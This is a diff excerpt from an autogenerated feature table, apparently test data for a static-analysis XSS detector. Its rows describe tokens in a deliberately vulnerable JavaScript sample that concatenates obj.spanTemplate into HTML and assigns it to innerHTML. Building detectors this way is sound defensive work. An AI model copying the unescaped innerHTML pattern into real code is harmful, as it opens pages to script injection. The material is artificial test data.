autogenerated/Xss/UnsafeHtmlConstruction/main.js:74:38:77:1 | 'arguments' object of anonymous function | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:74:38:77:1 | exceptional return of anonymous function | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:74:38:77:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:74:38:77:1 | exceptional return of anonymous function | enclosingFunctionBody | obj html <span> obj spanTemplate </span> document querySelector #template innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:74:38:77:1 | exceptional return of anonymous function | enclosingFunctionName | intentionalTemplate | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:74:38:77:1 | exceptional return of anonymous function | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:74:38:77:1 | functio ... html;\\n} | assignedToPropName | intentionalTemplate | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:74:38:77:1 | functio ... html;\\n} | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:74:38:77:1 | functio ... html;\\n} | contextSurroundingFunctionParameters | (obj) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:74:38:77:1 | functio ... html;\\n} | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:74:38:77:1 | return of anonymous function | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:74:38:77:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:74:38:77:1 | return of anonymous function | enclosingFunctionBody | obj html <span> obj spanTemplate </span> document querySelector #template innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:74:38:77:1 | return of anonymous function | enclosingFunctionName | intentionalTemplate | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:74:38:77:1 | return of anonymous function | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:74:48:74:50 | obj | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:74:48:74:50 | obj | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:74:48:74:50 | obj | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:74:48:74:50 | obj | contextSurroundingFunctionParameters | (obj) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:74:48:74:50 | obj | enclosingFunctionBody | obj html <span> obj spanTemplate </span> document querySelector #template innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:74:48:74:50 | obj | enclosingFunctionBody | obj html <span> obj spanTemplate </span> document querySelector #template innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:74:48:74:50 | obj | enclosingFunctionName | intentionalTemplate | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:74:48:74:50 | obj | enclosingFunctionName | intentionalTemplate | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:74:48:74:50 | obj | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:74:48:74:50 | obj | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:75:11:75:14 | html | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:75:11:75:14 | html | contextSurroundingFunctionParameters | (obj) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:75:11:75:14 | html | enclosingFunctionBody | obj html <span> obj spanTemplate </span> document querySelector #template innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:75:11:75:14 | html | enclosingFunctionName | intentionalTemplate | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:75:11:75:14 | html | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:75:11:75:56 | html | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:75:11:75:56 | html | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:75:11:75:56 | html | enclosingFunctionBody | obj html <span> obj spanTemplate </span> document querySelector #template innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:75:11:75:56 | html | enclosingFunctionName | intentionalTemplate | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:75:11:75:56 | html | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:75:11:75:56 | html = ... /span>" | contextSurroundingFunctionParameters | (obj) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:75:11:75:56 | html = ... /span>" | enclosingFunctionBody | obj html obj spanTemplate document querySelector #template innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:75:11:75:56 | html = ... /span>" | enclosingFunctionName | intentionalTemplate | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:75:11:75:56 | html = ... /span>" | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:75:18:75:25 | "" | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:75:18:75:25 | "" | contextSurroundingFunctionParameters | (obj) | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:75:18:75:25 | "" | enclosingFunctionBody | obj html obj spanTemplate document querySelector #template innerHTML html | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:75:18:75:25 | "" | enclosingFunctionName | intentionalTemplate | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:75:18:75:25 | "" | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:75:18:75:25 | "" | stringConcatenatedWith | -endpoint- obj.spanTemplate + '' | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:75:18:75:44 | " ... emplate | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:75:18:75:44 | " ... emplate | contextSurroundingFunctionParameters | (obj) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:75:18:75:44 | " ... emplate | enclosingFunctionBody | obj html obj spanTemplate document querySelector #template innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:75:18:75:44 | " ... emplate | enclosingFunctionName | intentionalTemplate | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:75:18:75:44 | " ... emplate | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:75:18:75:56 | " ... /span>" | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:75:18:75:56 | " ... /span>" | contextSurroundingFunctionParameters | (obj) | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:75:18:75:56 | " ... /span>" | enclosingFunctionBody | obj html obj spanTemplate document querySelector #template innerHTML html | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:75:18:75:56 | " ... /span>" | enclosingFunctionName | intentionalTemplate | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:75:18:75:56 | " ... /span>" | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:75:29:75:31 | obj | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:75:29:75:31 | obj | contextSurroundingFunctionParameters | (obj) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:75:29:75:31 | obj | enclosingFunctionBody | obj html obj spanTemplate document querySelector #template innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:75:29:75:31 | obj | enclosingFunctionName | intentionalTemplate | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:75:29:75:31 | obj | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:75:29:75:44 | obj.spanTemplate | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:75:29:75:44 | obj.spanTemplate | contextSurroundingFunctionParameters | (obj) | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:75:29:75:44 | obj.spanTemplate | enclosingFunctionBody | obj html obj spanTemplate document querySelector #template innerHTML html | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:75:29:75:44 | obj.spanTemplate | enclosingFunctionName | intentionalTemplate | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:75:29:75:44 | obj.spanTemplate | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:75:29:75:44 | obj.spanTemplate | stringConcatenatedWith | '' -endpoint- '' | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:75:33:75:44 | spanTemplate | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:75:33:75:44 | spanTemplate | contextSurroundingFunctionParameters | (obj) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:75:33:75:44 | spanTemplate | enclosingFunctionBody | obj html obj spanTemplate document querySelector #template innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:75:33:75:44 | spanTemplate | enclosingFunctionName | intentionalTemplate | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:75:33:75:44 | spanTemplate | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:75:48:75:56 | "" | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:75:48:75:56 | "" | contextSurroundingFunctionParameters | (obj) | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:75:48:75:56 | "" | enclosingFunctionBody | obj html obj spanTemplate document querySelector #template innerHTML html | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:75:48:75:56 | "" | enclosingFunctionName | intentionalTemplate | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:75:48:75:56 | "" | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:75:48:75:56 | "" | stringConcatenatedWith | '' + obj.spanTemplate -endpoint- | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:76:5:76:12 | document | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:76:5:76:12 | document | contextSurroundingFunctionParameters | (obj) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:76:5:76:12 | document | enclosingFunctionBody | obj html obj spanTemplate document querySelector #template innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:76:5:76:12 | document | enclosingFunctionName | intentionalTemplate | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:76:5:76:12 | document | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:76:5:76:26 | documen ... elector | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:76:5:76:26 | documen ... elector | contextSurroundingFunctionParameters | (obj) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:76:5:76:26 | documen ... elector | enclosingFunctionBody | obj html obj spanTemplate document querySelector #template innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:76:5:76:26 | documen ... elector | enclosingFunctionName | intentionalTemplate | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:76:5:76:26 | documen ... elector | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:76:5:76:39 | documen ... plate") | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:76:5:76:39 | documen ... plate") | contextSurroundingFunctionParameters | (obj) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:76:5:76:39 | documen ... plate") | enclosingFunctionBody | obj html obj spanTemplate document querySelector #template innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:76:5:76:39 | documen ... plate") | enclosingFunctionName | intentionalTemplate | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:76:5:76:39 | documen ... plate") | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:76:5:76:39 | exceptional return of documen ... plate") | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:76:5:76:39 | exceptional return of documen ... plate") | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:76:5:76:39 | exceptional return of documen ... plate") | enclosingFunctionBody | obj html obj spanTemplate document querySelector #template innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:76:5:76:39 | exceptional return of documen ... plate") | enclosingFunctionName | intentionalTemplate | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:76:5:76:39 | exceptional return of documen ... plate") | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:76:5:76:49 | documen ... nerHTML | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:76:5:76:49 | documen ... nerHTML | contextSurroundingFunctionParameters | (obj) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:76:5:76:49 | documen ... nerHTML | enclosingFunctionBody | obj html obj spanTemplate document querySelector #template innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:76:5:76:49 | documen ... nerHTML | enclosingFunctionName | intentionalTemplate | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:76:5:76:49 | documen ... nerHTML | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:76:5:76:56 | documen ... = html | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:76:5:76:56 | documen ... = html | contextSurroundingFunctionParameters | (obj) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:76:5:76:56 | documen ... = html | enclosingFunctionBody | obj html obj spanTemplate document querySelector #template innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:76:5:76:56 | documen ... = html | enclosingFunctionName | intentionalTemplate | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:76:5:76:56 | documen ... = html | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:76:14:76:26 | querySelector | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:76:14:76:26 | querySelector | contextSurroundingFunctionParameters | (obj) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:76:14:76:26 | querySelector | enclosingFunctionBody | obj html obj spanTemplate document querySelector #template innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:76:14:76:26 | querySelector | enclosingFunctionName | intentionalTemplate | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:76:14:76:26 | querySelector | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:76:28:76:38 | "#template" | CalleeFlexibleAccessPath | document.querySelector | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:76:28:76:38 | "#template" | InputArgumentIndex | 0 | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:76:28:76:38 | "#template" | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | @@ -23252,12 +152897,129 @@ tokenFeatures | autogenerated/Xss/UnsafeHtmlConstruction/main.js:76:28:76:38 | "#template" | enclosingFunctionName | intentionalTemplate | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:76:28:76:38 | "#template" | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:76:28:76:38 | "#template" | receiverName | document | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:76:41:76:49 | innerHTML | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:76:41:76:49 | innerHTML | contextSurroundingFunctionParameters | (obj) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:76:41:76:49 | innerHTML | enclosingFunctionBody | obj html obj spanTemplate document querySelector #template innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:76:41:76:49 | innerHTML | enclosingFunctionName | intentionalTemplate | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:76:41:76:49 | innerHTML | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:76:53:76:56 | html | assignedToPropName | innerHTML | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:76:53:76:56 | html | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:76:53:76:56 | html | contextSurroundingFunctionParameters | (obj) | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:76:53:76:56 | html | enclosingFunctionBody | obj html obj spanTemplate document querySelector #template innerHTML html | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:76:53:76:56 | html | enclosingFunctionName | intentionalTemplate | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:76:53:76:56 | html | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:79:1:79:6 | module | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:79:1:79:6 | module | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:79:1:79:6 | module | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:79:1:79:14 | module.exports | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:79:1:79:14 | module.exports | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:79:1:79:14 | module.exports | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:79:1:79:20 | module.exports.types | 